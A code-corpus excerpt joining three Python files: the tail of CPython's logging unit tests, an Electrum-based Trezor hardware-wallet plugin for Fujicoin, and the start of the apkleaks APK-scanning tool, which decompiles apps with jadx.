self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
#print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
support.run_unittest(
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase)
if __name__ == "__main__":
test_main()
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 6, 0)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Fujicoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
apkleaks.py
|
#!/usr/bin/env python3
import io
import json
import logging.config
import os
import re
import shutil
import sys
import tempfile
import threading
import filecmp
from contextlib import closing
from distutils.spawn import find_executable
from pathlib import Path
from pipes import quote
from urllib.request import urlopen
from zipfile import ZipFile
from pyaxmlparser import APK
from apkleaks.colors import color as col
from apkleaks.utils import util
class APKLeaks:
def __init__(self, args, filename):
self.apk = None
self.file = "./APKs/"+filename+".apk"
self.package = filename
self.json = args.json
self.disarg = args.args
self.prefix = "result-"
self.tempdir = tempfile.mkdtemp(prefix=self.prefix)
self.main_dir = os.path.dirname(os.path.realpath(__file__))
#self.output = self.main_dir+"/results/temp/"+filename+".txt"
#self.fileout = open(self.output, 'w')
self.output = tempfile.mkstemp(suffix=".%s" % ("json" if self.json else "txt"), prefix=self.prefix, dir=os.path.expanduser("~/apkscanner/results/temp/"))[1]
print(self.output)
self.fileout = open(self.output, "w")
self.pattern = os.path.join(str(Path(self.main_dir).parent), "config", "regexes.json") if args.pattern is None else args.pattern
self.jadx = find_executable("jadx") if find_executable("jadx") is not None else os.path.join(str(Path(self.main_dir).parent), "jadx", "bin", "jadx%s" % (".bat" if os.name == "nt" else "")).replace("\\","/")
self.out_json = {}
self.scanned = False
logging.config.dictConfig({"version": 1, "disable_existing_loggers": True})
def apk_info(self):
return APK(self.file)
def dependencies(self):
print("dependenciescalled")
exter = "https://github.com/skylot/jadx/releases/download/v1.2.0/jadx-1.2.0.zip"
try:
with closing(urlopen(exter)) as jadx:
with ZipFile(io.BytesIO(jadx.read())) as zfile:
zfile.extractall(os.path.join(str(Path(self.main_dir).parent), "jadx"))
